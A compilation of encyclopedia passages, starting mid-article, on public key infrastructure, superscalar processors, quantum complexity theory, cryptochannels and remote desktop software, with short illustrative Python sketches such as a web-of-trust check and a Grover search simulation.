A Netcraft report from 2015,[21] the industry standard for monitoring active Transport Layer Security (TLS) certificates, states that "Although the global [TLS] ecosystem is competitive, it is dominated by a handful of major CAs — three certificate authorities (Symantec, Sectigo, GoDaddy) account for three-quarters of all issued [TLS] certificates on public-facing web servers. The top spot has been held by Symantec (or VeriSign before it was purchased by Symantec) ever since [our] survey began, with it currently accounting for just under a third of all certificates. To illustrate the effect of differing methodologies, amongst the million busiest sites Symantec issued 44% of the valid, trusted certificates in use — significantly more than its overall market share."
Following major issues in how certificate issuing was managed, all major players gradually distrusted Symantec-issued certificates, a process that started in 2017 and was completed in 2021.[22][23][24][25]
This approach involves a server that acts as an offline certificate authority within a single sign-on system. A single sign-on server will issue digital certificates into the client system, but never stores them. Users can execute programs, etc. with the temporary certificate. This solution variety is commonly found with X.509-based certificates.[26]
Since September 2020, TLS certificate validity has been reduced to 13 months.
An alternative approach to the problem of public authentication of public key information is the web-of-trust scheme, which uses self-signed certificates and third-party attestations of those certificates. The singular term "web of trust" does not imply the existence of a single web of trust, or common point of trust, but rather one of any number of potentially disjoint "webs of trust". Examples of implementations of this approach are PGP (Pretty Good Privacy) and GnuPG (an implementation of OpenPGP, the standardized specification of PGP). Because PGP and its implementations allow the use of e-mail digital signatures for self-publication of public key information, it is relatively easy to implement one's own web of trust.
One of the benefits of the web of trust, such as in PGP, is that it can interoperate with a PKI CA fully trusted by all parties in a domain (such as an internal CA in a company) that is willing to guarantee certificates, as a trusted introducer. If the "web of trust" is completely trusted then, because of the nature of a web of trust, trusting one certificate is granting trust to all the certificates in that web. A PKI is only as valuable as the standards and practices that control the issuance of certificates, and including PGP or a personally instituted web of trust could significantly degrade the trustworthiness of that enterprise's or domain's implementation of PKI.[27]
The web of trust concept was first put forth by PGP creator Phil Zimmermann in 1992 in the manual for PGP version 2.0:
As time goes on, you will accumulate keys from other people that you may want to designate as trusted introducers. Everyone else will each choose their own trusted introducers. And everyone will gradually accumulate and distribute with their key a collection of certifying signatures from other people, with the expectation that anyone receiving it will trust at least one or two of the signatures. This will cause the emergence of a decentralized fault-tolerant web of confidence for all public keys.
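The "trusted introducer" idea Zimmermann describes amounts to reachability in a graph of certifying signatures. A toy sketch with hypothetical names (real implementations such as PGP weight signatures and cap chain length rather than trusting any path):

```python
# Toy web of trust: signer -> set of keys that signer has certified.
signatures = {
    "me": {"alice"},
    "alice": {"bob"},
    "bob": {"carol"},
}

def trusted(target: str, root: str = "me") -> bool:
    """A key is trusted if a chain of signatures leads from `root` to it."""
    seen, frontier = set(), [root]
    while frontier:
        signer = frontier.pop()
        if signer == target:
            return True
        if signer in seen:
            continue
        seen.add(signer)
        frontier.extend(signatures.get(signer, ()))
    return False

print(trusted("carol"))    # True: me -> alice -> bob -> carol
print(trusted("mallory"))  # False: no chain of introducers reaches this key
```

Disjoint "webs of trust" correspond to disconnected components of this graph: two keys with no signature path between them confer no trust on each other.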
Another alternative, which does not deal with public authentication of public key information, is the simple public key infrastructure (SPKI), which grew out of three independent efforts to overcome the complexities of X.509 and PGP's web of trust. SPKI does not associate users with persons, since the key is what is trusted, rather than the person. SPKI does not use any notion of trust, as the verifier is also the issuer. This is called an "authorization loop" in SPKI terminology, where authorization is integral to its design.[28] This type of PKI is especially useful for integrations of PKI that do not rely on third parties for certificate authorization, certificate information, etc.; a good example is an air-gapped network in an office.
Decentralized identifiers (DIDs) eliminate dependence on centralized registries for identifiers as well as centralized certificate authorities for key management, which is the standard in hierarchical PKI. In cases where the DID registry is a distributed ledger, each entity can serve as its own root authority. This architecture is referred to as decentralized PKI (DPKI).[29][30]
Developments in PKI occurred in the early 1970s at the British intelligence agency GCHQ, where James Ellis, Clifford Cocks and others made important discoveries related to encryption algorithms and key distribution.[31] Because developments at GCHQ are highly classified, the results of this work were kept secret and not publicly acknowledged until the mid-1990s.
The public disclosure of both secure key exchange and asymmetric key algorithms in 1976 by Diffie, Hellman, Rivest, Shamir, and Adleman changed secure communications entirely. With the further development of high-speed digital electronic communications (the Internet and its predecessors), a need became evident for ways in which users could securely communicate with each other, and as a further consequence of that, for ways in which users could be sure with whom they were actually interacting.
Assorted cryptographic protocols were invented and analyzed within which the new cryptographic primitives could be effectively used. With the invention of the World Wide Web and its rapid spread, the need for authentication and secure communication became still more acute. Commercial reasons alone (e.g., e-commerce, online access to proprietary databases from web browsers) were sufficient. Taher Elgamal and others at Netscape developed the SSL protocol ('https' in Web URLs); it included key establishment, server authentication (prior to v3, one-way only), and so on.[32] A PKI structure was thus created for Web users/sites wishing secure communications.
Vendors and entrepreneurs saw the possibility of a large market, started companies (or new projects at existing companies), and began to agitate for legal recognition and protection from liability. An American Bar Association technology project published an extensive analysis of some of the foreseeable legal aspects of PKI operations (see ABA digital signature guidelines), and shortly thereafter, several U.S. states (Utah being the first in 1995) and other jurisdictions throughout the world began to enact laws and adopt regulations. Consumer groups raised questions about privacy, access, and liability considerations, which were taken into consideration more in some jurisdictions than in others.[33]
The enacted laws and regulations differed; there were technical and operational problems in converting PKI schemes into successful commercial operation; and progress has been much slower than pioneers had imagined it would be.
By the first few years of the 21st century, the underlying cryptographic engineering was clearly not easy to deploy correctly. Operating procedures (manual or automatic) were not easy to design correctly, nor, even if so designed, to execute perfectly, as the engineering required. The standards that existed were insufficient.
PKI vendors have found a market, but it is not quite the market envisioned in the mid-1990s, and it has grown both more slowly and in somewhat different ways than were anticipated.[34] PKIs have not solved some of the problems they were expected to, and several major vendors have gone out of business or been acquired by others. PKI has had the most success in government implementations; the largest PKI implementation to date is the Defense Information Systems Agency (DISA) PKI infrastructure for the Common Access Cards program.
PKIs of one type or another, and from any of several vendors, have many uses, including providing public keys and bindings to user identities, which are used for:
Some argue that purchasing certificates for securing websites by SSL/TLS and securing software by code signing is a costly venture for small businesses.[41] However, the emergence of free alternatives, such as Let's Encrypt, has changed this. HTTP/2, the latest version of the HTTP protocol, allows unsecured connections in theory; in practice, major browser companies have made it clear that they would support this protocol only over a PKI-secured TLS connection.[42] Web browser implementations of HTTP/2, including Chrome, Firefox, Opera, and Edge, support HTTP/2 only over TLS by using the ALPN extension of the TLS protocol. This would mean that, to get the speed benefits of HTTP/2, website owners would be forced to purchase SSL/TLS certificates controlled by corporations.
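How ALPN ties HTTP/2 to TLS can be sketched with Python's standard-library `ssl` module: the client advertises the protocols it supports inside the TLS handshake, so there is no way to negotiate `h2` this way without a verified TLS connection. (No connection is made here; actual protocol selection happens only during a real handshake.)

```python
import ssl

# Advertise HTTP/2 ("h2") via the ALPN extension, with HTTP/1.1 fallback.
ctx = ssl.create_default_context()
ctx.set_alpn_protocols(["h2", "http/1.1"])

# The same context still requires certificate verification, which is why
# browser HTTP/2 support implies a PKI-secured TLS connection.
print(ctx.verify_mode == ssl.CERT_REQUIRED)  # True
```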
Currently the majority of web browsers are shipped with pre-installed intermediate certificates issued and signed by a certificate authority, with public keys certified by so-called root certificates. This means browsers need to carry a large number of different certificate providers, increasing the risk of a key compromise.[43]
When a key is known to be compromised, the problem can be fixed by revoking the certificate, but such a compromise is not easily detectable and can be a huge security breach. Browsers have to issue a security patch to revoke intermediary certificates issued by a compromised root certificate authority.[44]
https://en.wikipedia.org/wiki/Public_key_infrastructure
A superscalar processor (or multiple-issue processor[1]) is a CPU that implements a form of parallelism called instruction-level parallelism within a single processor.[2] In contrast to a scalar processor, which can execute at most one single instruction per clock cycle, a superscalar processor can execute or start executing more than one instruction during a clock cycle by simultaneously dispatching multiple instructions to different execution units on the processor. It therefore allows more throughput (the number of instructions that can be executed in a unit of time, which can even be less than 1) than would otherwise be possible at a given clock rate. Each execution unit is not a separate processor (or a core if the processor is a multi-core processor), but an execution resource within a single CPU such as an arithmetic logic unit.
While a superscalar CPU is typically also pipelined, superscalar execution and pipelining are considered different performance enhancement techniques. The former (superscalar) executes multiple instructions in parallel by using multiple execution units, whereas the latter (pipelining) executes multiple instructions in the same execution unit in parallel by dividing the execution unit into different phases. In the "Simple superscalar pipeline" figure, fetching two instructions at the same time is superscaling, and fetching the next two before the first pair has been written back is pipelining.
The superscalar technique is traditionally associated with several identifying characteristics (within a given CPU):
Seymour Cray's CDC 6600 from 1964, while not capable of issuing multiple instructions per cycle, is often cited as an early influence on modern superscalar processors for its ability to execute instructions simultaneously through multiple functional units. The 1967 IBM System/360 Model 91 was another early influence; it introduced out-of-order execution, pioneering the use of Tomasulo's algorithm.[3] The Intel i960CA (1989),[4] the AMD 29000-series 29050 (1990), and the Motorola MC88110 (1991)[5] were the first commercial single-chip superscalar microprocessors. RISC microprocessors like these were the first to have superscalar execution, because RISC architectures free transistors and die area which can be used to include multiple execution units, and the traditional uniformity of the instruction set favors superscalar dispatch (this was why RISC designs were faster than CISC designs through the 1980s and into the 1990s, and it is far more complicated to do multiple dispatch when instructions have variable bit length).
Except for CPUs used in low-power applications, embedded systems, and battery-powered devices, essentially all general-purpose CPUs developed since about 1998 are superscalar.
The P5 Pentium was the first superscalar x86 processor; the Nx586, P6 Pentium Pro and AMD K5 were among the first designs which decoded x86 instructions asynchronously into dynamic microcode-like micro-op sequences prior to actual execution on a superscalar microarchitecture; this opened up for dynamic scheduling of buffered partial instructions and enabled more parallelism to be extracted compared to the more rigid methods used in the simpler P5 Pentium; it also simplified speculative execution and allowed higher clock frequencies compared to designs such as the advanced Cyrix 6x86.
The simplest processors are scalar processors. Each instruction executed by a scalar processor typically manipulates one or two data items at a time. By contrast, each instruction executed by a vector processor operates simultaneously on many data items. An analogy is the difference between scalar and vector arithmetic. A superscalar processor is a mixture of the two. Each instruction processes one data item, but there are multiple execution units within each CPU, so multiple instructions can be processing separate data items concurrently.
Superscalar CPU design emphasizes improving the instruction dispatcher's accuracy and allowing it to keep the multiple execution units in use at all times. This has become increasingly important as the number of units has increased. While early superscalar CPUs would have two ALUs and a single FPU, a later design such as the PowerPC 970 includes four ALUs, two FPUs, and two SIMD units. If the dispatcher is ineffective at keeping all of these units fed with instructions, the performance of the system will be no better than that of a simpler, cheaper design.
A superscalar processor usually sustains an execution rate in excess of one instruction per machine cycle. But merely processing multiple instructions concurrently does not make an architecture superscalar, since pipelined, multiprocessor or multi-core architectures also achieve that, but with different methods.
In a superscalar CPU the dispatcher reads instructions from memory and decides which ones can be run in parallel, dispatching each to one of the several execution units contained inside a single CPU. Therefore, a superscalar processor can be envisioned as having multiple parallel pipelines, each of which is processing instructions simultaneously from a single instruction thread.
Most modern superscalar CPUs also have logic to reorder the instructions to try to avoid pipeline stalls and increase parallel execution.
Available performance improvement from superscalar techniques is limited by three key areas:
Existing binary executable programs have varying degrees of intrinsic parallelism. In some cases instructions are not dependent on each other and can be executed simultaneously. In other cases they are inter-dependent: one instruction impacts either resources or results of the other. The instructions a = b + c; d = e + f can be run in parallel because none of the results depend on other calculations. However, the instructions a = b + c; b = e + f might not be runnable in parallel, depending on the order in which the instructions complete while they move through the units.
Although the instruction stream may contain no inter-instruction dependencies, a superscalar CPU must nonetheless check for that possibility, since there is no assurance otherwise and failure to detect a dependency would produce incorrect results.
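The dependency check a dual-issue dispatcher performs can be sketched as a toy predicate over register names: two instructions, each written as (destination, source, source), can issue together only if neither writes a register the other reads or writes. This is an illustrative model, not any specific CPU's logic.

```python
def independent(i1, i2):
    """True if two (dest, src1, src2) instructions have no register hazard."""
    d1, *srcs1 = i1
    d2, *srcs2 = i2
    return (d1 != d2            # no write-after-write hazard
            and d1 not in srcs2  # no read-after-write hazard
            and d2 not in srcs1) # no write-after-read hazard

# a = b + c ; d = e + f -> no shared registers, can issue in parallel
print(independent(("a", "b", "c"), ("d", "e", "f")))  # True
# a = b + c ; b = e + f -> second writes a register the first reads
print(independent(("a", "b", "c"), ("b", "e", "f")))  # False
```

Real dispatchers must run an equivalent check across every pair of candidate instructions each cycle, which is why the checking burden grows rapidly with issue width.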
No matter how advanced the semiconductor process or how fast the switching speed, this places a practical limit on how many instructions can be simultaneously dispatched. While process advances will allow ever greater numbers of execution units (e.g. ALUs), the burden of checking instruction dependencies grows rapidly, as does the complexity of register renaming circuitry to mitigate some dependencies. Collectively the power consumption, complexity and gate delay costs limit the achievable superscalar speedup.
However, even given infinitely fast dependency checking logic on an otherwise conventional superscalar CPU, if the instruction stream itself has many dependencies, this would also limit the possible speedup. Thus the degree of intrinsic parallelism in the code stream forms a second limitation.
Collectively, these limits drive investigation into alternative architectural changes such as very long instruction word (VLIW), explicitly parallel instruction computing (EPIC), simultaneous multithreading (SMT), and multi-core computing.
With VLIW, the burdensome task of dependency checking by hardware logic at run time is removed and delegated to the compiler. Explicitly parallel instruction computing (EPIC) is like VLIW with extra cache prefetching instructions.
Simultaneous multithreading (SMT) is a technique for improving the overall efficiency of superscalar processors. SMT permits multiple independent threads of execution to better utilize the resources provided by modern processor architectures. Because the threads are independent, an instruction of one thread can be executed out of order and/or in parallel with an instruction of a different one. Also, one independent thread will not produce a pipeline bubble in the code stream of a different one, for example due to a branch.
Superscalar processors differ from multi-core processors in that the several execution units are not entire processors. A single processor is composed of finer-grained execution units such as the ALU, integer multiplier, integer shifter, FPU, etc. There may be multiple versions of each execution unit to enable the execution of many instructions in parallel. This differs from a multi-core processor that concurrently processes instructions from multiple threads, one thread per processing unit (called a "core"). It also differs from a pipelined processor, where the multiple instructions can concurrently be in various stages of execution, assembly-line fashion.
The various alternative techniques are not mutually exclusive: they can be (and frequently are) combined in a single processor. Thus a multicore CPU is possible where each core is an independent processor containing multiple parallel pipelines, each pipeline being superscalar. Some processors also include vector capability.
https://en.wikipedia.org/wiki/Superscalar
Quantum complexity theory is the subfield of computational complexity theory that deals with complexity classes defined using quantum computers, a computational model based on quantum mechanics. It studies the hardness of computational problems in relation to these complexity classes, as well as the relationship between quantum complexity classes and classical (i.e., non-quantum) complexity classes.
Two important quantum complexity classes are BQP and QMA.
A complexity class is a collection of computational problems that can be solved by a computational model under certain resource constraints. For instance, the complexity class P is defined as the set of problems solvable by a Turing machine in polynomial time. Similarly, quantum complexity classes may be defined using quantum models of computation, such as the quantum circuit model or the equivalent quantum Turing machine. One of the main aims of quantum complexity theory is to find out how these classes relate to classical complexity classes such as P, NP, BPP, and PSPACE.
One of the reasons quantum complexity theory is studied is the implications of quantum computing for the modern Church–Turing thesis. In short, the modern Church–Turing thesis states that any computational model can be simulated in polynomial time with a probabilistic Turing machine.[1][2] However, questions around the thesis arise in the context of quantum computing: it is unclear whether the Church–Turing thesis holds for the quantum computation model, and there is much evidence that it does not. It may not be possible for a probabilistic Turing machine to simulate quantum computation models in polynomial time.[1]
Both quantum computational complexity of functions and classical computational complexity of functions are often expressed with asymptotic notation. Some common forms are O(T(n)){\displaystyle O(T(n))}, Ω(T(n)){\displaystyle \Omega (T(n))}, and Θ(T(n)){\displaystyle \Theta (T(n))}. O(T(n)){\displaystyle O(T(n))}, called Big O notation, expresses that a quantity is bounded above by cT(n){\displaystyle cT(n)}, where c{\displaystyle c} is a constant with c>0{\displaystyle c>0} and T(n){\displaystyle T(n)} is a function of n{\displaystyle n}. Ω(T(n)){\displaystyle \Omega (T(n))}, called Big Omega notation, expresses that a quantity is bounded below by cT(n){\displaystyle cT(n)} for such a constant c{\displaystyle c}. Θ(T(n)){\displaystyle \Theta (T(n))}, called Big Theta notation, expresses both O(T(n)){\displaystyle O(T(n))} and Ω(T(n)){\displaystyle \Omega (T(n))}.[3]
The important complexity classes P, BPP, BQP, PP, and PSPACE can be compared based on promise problems. A promise problem is a decision problem whose input is promised to belong to a particular subset of all possible input strings. A promise problem is a pair A=(Ayes,Ano){\displaystyle A=(A_{\text{yes}},A_{\text{no}})}, where Ayes{\displaystyle A_{\text{yes}}} is the set of yes instances and Ano{\displaystyle A_{\text{no}}} is the set of no instances, and the intersection of these sets is empty: Ayes∩Ano=∅{\displaystyle A_{\text{yes}}\cap A_{\text{no}}=\varnothing }. All of the previous complexity classes contain promise problems.[4]
The class of problems that can be efficiently solved by a quantum computer with bounded error is called BQP ("bounded error, quantum, polynomial time"). More formally, BQP is the class of problems that can be solved by a polynomial-time quantum Turing machine with error probability of at most 1/3.
As a class of probabilistic problems, BQP is the quantum counterpart to BPP ("bounded error, probabilistic, polynomial time"), the class of problems that can be efficiently solved by probabilistic Turing machines with bounded error.[6] It is known that BPP⊆BQP{\displaystyle {\mathsf {BPP\subseteq BQP}}} and widely suspected, but not proven, that BQP⊈BPP{\displaystyle {\mathsf {BQP\nsubseteq BPP}}}, which intuitively would mean that quantum computers are more powerful than classical computers in terms of time complexity.[7] BQP is a subset of PP.
The exact relationship of BQP to P, NP, and PSPACE is not known. However, it is known that P⊆BQP⊆PSPACE{\displaystyle {\mathsf {P\subseteq BQP\subseteq PSPACE}}}; that is, the class of problems that can be efficiently solved by quantum computers includes all problems that can be efficiently solved by deterministic classical computers but does not include any problems that cannot be solved by classical computers with polynomial space resources. It is further suspected that BQP is a strict superset of P, meaning there are problems that are efficiently solvable by quantum computers that are not efficiently solvable by deterministic classical computers. For instance, integer factorization and the discrete logarithm problem are known to be in BQP and are suspected to be outside of P. On the relationship of BQP to NP, little is known beyond the fact that some NP problems are in BQP (integer factorization and the discrete logarithm problem are both in NP, for example). It is suspected that NP⊈BQP{\displaystyle {\mathsf {NP\nsubseteq BQP}}}; that is, it is believed that there are efficiently checkable problems that are not efficiently solvable by a quantum computer. As a direct consequence of this belief, it is also suspected that BQP is disjoint from the class of NP-complete problems (if any NP-complete problem were in BQP, then it follows from NP-hardness that all problems in NP are in BQP).[8]
The relationship of BQP to the essential classical complexity classes can be summarized as:
It is also known that BQP is contained in the complexity class #P{\displaystyle {\mathsf {\#P}}} (or more precisely in the associated class of decision problems P#P{\displaystyle {\mathsf {P^{\#P}}}}),[8] which is a subset of PSPACE.
There is no known way to efficiently simulate a quantum computational model with a classical computer. This means that a classical computer cannot simulate a quantum computational model in polynomial time. However, a quantum circuit of S(n){\displaystyle S(n)} qubits with T(n){\displaystyle T(n)} quantum gates can be simulated by a classical circuit with O(2S(n)T(n)3){\displaystyle O(2^{S(n)}T(n)^{3})} classical gates.[3] This number of classical gates is obtained by determining how many bit operations are necessary to simulate the quantum circuit. In order to do this, first the amplitudes associated with the S(n){\displaystyle S(n)} qubits must be accounted for. Each of the states of the S(n){\displaystyle S(n)} qubits can be described by a two-dimensional complex vector, or state vector. These state vectors can also be described as a linear combination of component vectors with coefficients called amplitudes. These amplitudes are complex numbers which are normalized to one, meaning the sum of the squares of the absolute values of the amplitudes must be one.[3] The entries of the state vector are these amplitudes; each amplitude's entry corresponds to the nonzero component of the component vector of which it is the coefficient in the linear combination description. As an equation, this is described as α[10]+β[01]=[αβ]{\displaystyle \alpha {\begin{bmatrix}1\\0\end{bmatrix}}+\beta {\begin{bmatrix}0\\1\end{bmatrix}}={\begin{bmatrix}\alpha \\\beta \end{bmatrix}}} or α|0⟩+β|1⟩=[αβ]{\displaystyle \alpha \left\vert 0\right\rangle +\beta \left\vert 1\right\rangle ={\begin{bmatrix}\alpha \\\beta \end{bmatrix}}} using Dirac notation. The state of the entire S(n){\displaystyle S(n)}-qubit system can be described by a single state vector, which is the tensor product of the state vectors describing the individual qubits in the system.
The result of the tensor products of the S(n){\displaystyle S(n)} qubits is a single state vector which has 2S(n){\displaystyle 2^{S(n)}} dimensions and entries that are the amplitudes associated with each basis state or component vector. Therefore, 2S(n){\displaystyle 2^{S(n)}} amplitudes must be accounted for with a 2S(n){\displaystyle 2^{S(n)}}-dimensional complex vector, which is the state vector for the S(n){\displaystyle S(n)}-qubit system.[9] In order to obtain an upper bound for the number of gates required to simulate a quantum circuit, we need a sufficient upper bound for the amount of data used to specify the information about each of the 2S(n){\displaystyle 2^{S(n)}} amplitudes. O(T(n)){\displaystyle O(T(n))} bits of precision are sufficient for encoding each amplitude,[3] so it takes O(2S(n)T(n)){\displaystyle O(2^{S(n)}T(n))} classical bits to account for the state vector of the S(n){\displaystyle S(n)}-qubit system. Next, the application of the T(n){\displaystyle T(n)} quantum gates on 2S(n){\displaystyle 2^{S(n)}} amplitudes must be accounted for. The quantum gates can be represented as 2S(n)×2S(n){\displaystyle 2^{S(n)}\times 2^{S(n)}} sparse matrices.[3] So to account for the application of each of the T(n){\displaystyle T(n)} quantum gates, the state vector must be multiplied by a 2S(n)×2S(n){\displaystyle 2^{S(n)}\times 2^{S(n)}} sparse matrix for each of the T(n){\displaystyle T(n)} quantum gates. Every time the state vector is multiplied by such a sparse matrix, O(2S(n)){\displaystyle O(2^{S(n)})} arithmetic operations must be performed.[3] Therefore, there are O(2S(n)T(n)2){\displaystyle O(2^{S(n)}T(n)^{2})} bit operations for every quantum gate applied to the state vector; that is, O(2S(n)T(n)2){\displaystyle O(2^{S(n)}T(n)^{2})} classical gates are needed to simulate an S(n){\displaystyle S(n)}-qubit circuit with just one quantum gate.
Therefore, O(2^S(n) T(n)^3) classical gates are needed to simulate a quantum circuit of S(n) qubits with T(n) quantum gates.[3] While there is no known way to efficiently simulate a quantum computer with a classical computer, it is possible to efficiently simulate a classical computer with a quantum computer. This is evident from the fact that BPP ⊆ BQP.[4]
One major advantage of using a quantum computational system instead of a classical one is that a quantum computer may give a polynomial-time algorithm for some problem for which no classical polynomial-time algorithm is known, and may significantly decrease the calculation time for a problem that a classical computer can already solve efficiently. Quantum query complexity measures how many queries to the input (for graph problems, queries to the graph) are required to solve a particular problem. Before delving further into query complexity, let us consider some background regarding how problem inputs are represented as graphs and the queries associated with them.
One type of problem that quantum computing can make easier to solve is graph problems. To consider the number of queries to a graph that are required to solve a given problem, let us first consider directed graphs, the most common type of graph associated with this kind of computational modelling. In brief, directed graphs are graphs in which all edges between vertices are unidirectional. Directed graphs are formally defined as G = (N, E), where N is the set of vertices, or nodes, and E is the set of edges.[10]
When considering quantum computation of the solution to directed graph problems, there are two important query models to understand. First, there is the adjacency matrix model, where the graph is given by its adjacency matrix M ∈ {0,1}^(n×n), with M_ij = 1 if and only if (v_i, v_j) ∈ E.[11]
Next, there is the slightly more complicated adjacency array model, built on the idea of adjacency lists, where every vertex i is associated with an array of its neighboring vertices: a function f_i : [d_i⁺] → [n], where d_1⁺, ..., d_n⁺ are the out-degrees of the vertices, n is the number of vertices, and f_i(j) returns the j-th vertex adjacent to i. Additionally, the adjacency array model satisfies the simple graph condition ∀ i ∈ [n], j, j′ ∈ [d_i⁺], j ≠ j′ : f_i(j) ≠ f_i(j′), meaning that each neighbor appears only once in the array, so there is at most one edge between any pair of vertices (see Spanning tree for more background).[11]
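The two query models can be sketched as small classical oracles with query counters; the class names here (MatrixOracle, ArrayOracle) are illustrative, not standard terminology.

```python
class MatrixOracle:
    """Adjacency matrix model: query(i, j) returns M[i][j]."""
    def __init__(self, n, edges):
        self.M = [[0] * n for _ in range(n)]
        for i, j in edges:
            self.M[i][j] = 1
        self.queries = 0  # count oracle accesses

    def query(self, i, j):
        self.queries += 1
        return self.M[i][j]


class ArrayOracle:
    """Adjacency array model: query(i, j) returns f_i(j), the j-th
    vertex adjacent to i (0-indexed in this sketch)."""
    def __init__(self, n, edges):
        self.adj = [[] for _ in range(n)]
        for i, j in edges:
            self.adj[i].append(j)  # simple graph: each neighbor once
        self.queries = 0

    def out_degree(self, i):
        return len(self.adj[i])

    def query(self, i, j):
        self.queries += 1
        return self.adj[i][j]


edges = [(0, 1), (0, 2), (1, 2)]
m = MatrixOracle(3, edges)
a = ArrayOracle(3, edges)
```

An algorithm's query complexity in either model is the number of such `query` calls it makes, which is why the same graph problem can have different complexities in the two models.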
Both of the above models can be used to determine the query complexity of particular types of graph problems, including the connectivity, strong connectivity (a directed-graph version of connectivity), minimum spanning tree, and single source shortest path problems. An important caveat to consider is that the quantum query complexity of a particular graph problem can change depending on the query model (matrix or array) used to determine the solution. The following table showing the quantum query complexities of these types of graph problems illustrates this point well.
Notice the discrepancy between the quantum query complexities associated with a particular type of problem, depending on which query model was used to determine the complexity. For example, when the matrix model is used, the quantum query complexity of connectivity in Big O notation is Θ(n^(3/2)), but when the array model is used, the complexity is Θ(n). Additionally, for brevity, the shorthand m is used in certain cases, where m = Θ(n²).[11] The important implication here is that the efficiency of the algorithm used to solve a graph problem depends on the type of query model used to access the graph.
In the query complexity model, the input can also be given as an oracle (black box). The algorithm gets information about the input only by querying the oracle. The algorithm starts in some fixed quantum state and the state evolves as it queries the oracle.
Similar to the case of graphing problems, the quantum query complexity of a black-box problem is the smallest number of queries to the oracle that are required in order to calculate the function. This makes the quantum query complexity a lower bound on the overall time complexity of a function.
An example depicting the power of quantum computing is Grover's algorithm for searching unstructured databases. The algorithm's quantum query complexity is O(√N), a quadratic improvement over the best possible classical query complexity O(N), which is a linear search. Grover's algorithm is asymptotically optimal; in fact, it uses at most a 1 + o(1) fraction more queries than the best possible algorithm.[12]
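The quadratic speedup can be seen in a classically simulated toy run of Grover's algorithm. The sketch below (illustrative parameters: N = 16, an arbitrary marked index) applies the standard sign-flip oracle and inversion-about-the-mean diffusion to a real amplitude vector.

```python
import math
import numpy as np

# Classically simulated Grover search over N = 16 items.
N = 16
marked = 11  # arbitrary marked item for the sketch

# Start in the uniform superposition over all N basis states.
psi = np.full(N, 1 / math.sqrt(N))

# Each Grover iteration makes one oracle query; about (pi/4)*sqrt(N)
# iterations suffice, versus O(N) classical queries.
iterations = int(round(math.pi / 4 * math.sqrt(N)))  # 3 for N = 16
for _ in range(iterations):
    psi[marked] *= -1              # oracle: flip the marked amplitude
    psi = 2 * psi.mean() - psi     # diffusion: inversion about the mean

success_probability = psi[marked] ** 2
```

With only 3 oracle queries the marked item is measured with probability above 0.9, while a classical linear search needs on the order of N queries.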
The Deutsch–Jozsa algorithm is a quantum algorithm designed to solve a toy problem with a smaller query complexity than is possible with a classical algorithm. The toy problem asks whether a function f : {0,1}^n → {0,1} is constant or balanced, those being the only two possibilities.[2] The only way to evaluate the function f is to consult a black box or oracle. A classical deterministic algorithm will have to check more than half of the possible inputs to be sure whether the function is constant or balanced. With 2^n possible inputs, the query complexity of the most efficient classical deterministic algorithm is 2^(n−1) + 1.[2] The Deutsch–Jozsa algorithm takes advantage of quantum parallelism to check all of the elements of the domain at once and only needs to query the oracle once, making its query complexity 1.[2]
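The classical 2^(n−1) + 1 bound can be demonstrated with a short sketch of the optimal deterministic strategy (the function names here are illustrative): query inputs until either two different values are seen, or a majority of inputs agree.

```python
from itertools import product

def classify(f, n):
    """Classically decide whether f: {0,1}^n -> {0,1} is constant or
    balanced, counting oracle queries. Worst case: 2^(n-1)+1 queries;
    the Deutsch-Jozsa algorithm needs a single quantum query."""
    queries = 0
    seen = set()
    for x in product([0, 1], repeat=n):
        seen.add(f(x))
        queries += 1
        if len(seen) == 2:
            return "balanced", queries
        if queries == 2 ** (n - 1) + 1:
            # A strict majority of inputs agree, so f cannot be balanced.
            return "constant", queries

n = 3
constant_f = lambda x: 1
balanced_f = lambda x: x[0]   # 1 on exactly half of the inputs

c_label, c_queries = classify(constant_f, n)
b_label, b_queries = classify(balanced_f, n)
```

For n = 3 the constant function is only confirmed after 2² + 1 = 5 queries, matching the bound stated above.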
It has been speculated that further advances in physics could lead to even faster computers. For instance, it has been shown that a non-local hidden variable quantum computer based on Bohmian mechanics could implement a search of an N-item database in at most O(∛N) steps, a slight speedup over Grover's algorithm, which runs in O(√N) steps. Note, however, that neither search method would allow quantum computers to solve NP-complete problems in polynomial time.[13] Theories of quantum gravity, such as M-theory and loop quantum gravity, may allow even faster computers to be built. However, defining computation in these theories is an open problem due to the problem of time; that is, within these physical theories there is currently no obvious way to describe what it means for an observer to submit input to a computer at one point in time and then receive output at a later point in time.[14][15]
|
https://en.wikipedia.org/wiki/Quantum_complexity_theory
|
In telecommunications, a cryptochannel is a complete system of crypto-communications between two or more holders or parties. It includes: (a) the cryptographic aids prescribed; (b) the holders thereof; (c) the indicators or other means of identification; (d) the area or areas in which effective; (e) the special purpose, if any, for which provided; and (f) pertinent notes as to distribution, usage, etc. A cryptochannel is analogous to a radio circuit.[1][2][3][4]
|
https://en.wikipedia.org/wiki/Cryptochannel
|
In computing, the term remote desktop refers to a software or operating system feature that allows a personal computer's desktop environment to be run remotely from one system (usually a PC, but the concept applies equally to a server or a smartphone), while being displayed on a separate client device. Remote desktop applications have varying features. Some allow attaching to an existing user's session and "remote controlling", either displaying the remote control session or blanking the screen. Taking over a desktop remotely is a form of remote administration.
Remote access can also be explained as the remote control of a computer by using another device connected via the internet or another network. This is widely used by many computer manufacturers' and large businesses' help desks for technical troubleshooting of their customers' problems.
Remote desktop software captures the mouse and keyboard inputs from the local computer (client) and sends them to the remote computer (server).[1] The remote computer in turn sends the display commands to the local computer. When applications with many graphics, including video or 3D models, need to be controlled remotely, remote workstation software that sends the pixels rather than the display commands must be used to provide a smooth, like-local experience.
Remote desktop sharing is accomplished through a common client/server model. The client, orVNCviewer, is installed on a local computer and then connects via a network to a server component, which is installed on the remote computer. In a typical VNC session, all keystrokes and mouse clicks are registered as if the client were actually performing tasks on the end-user machine.[2]
Remote desktops also have a major security advantage for development: companies are able to permit software engineers who may be dispersed geographically to operate and develop from a computer which can be held within the company's office or cloud environment.
The target computer in a remote desktop scenario is still able to access all of its core functions. Many of these core functions, including the mainclipboard, can be shared between the target computer and remote desktop client.
Following the onset of COVID-19, the shift to remote-work environments has led many to work from home with devices without enterprise IT support. As a result, these workers were reliant on remote desktop software to collaborate and keep their systems available and secure.[3]
A main use of remote desktop software is remote administration and remote implementation. This need arises when software buyers are far away from their software vendor. Most remote access software can be used for "headless computers": instead of each computer having its own monitor, keyboard, and mouse, or using aKVM switch, one computer can have a monitor, keyboard, mouse, and remote control software, and control many headless computers. The duplicate desktop mode is useful for user support and education. Remote control software combined with telephone communication can be nearly as helpful for novice computer-users as if the support staff were actually there.
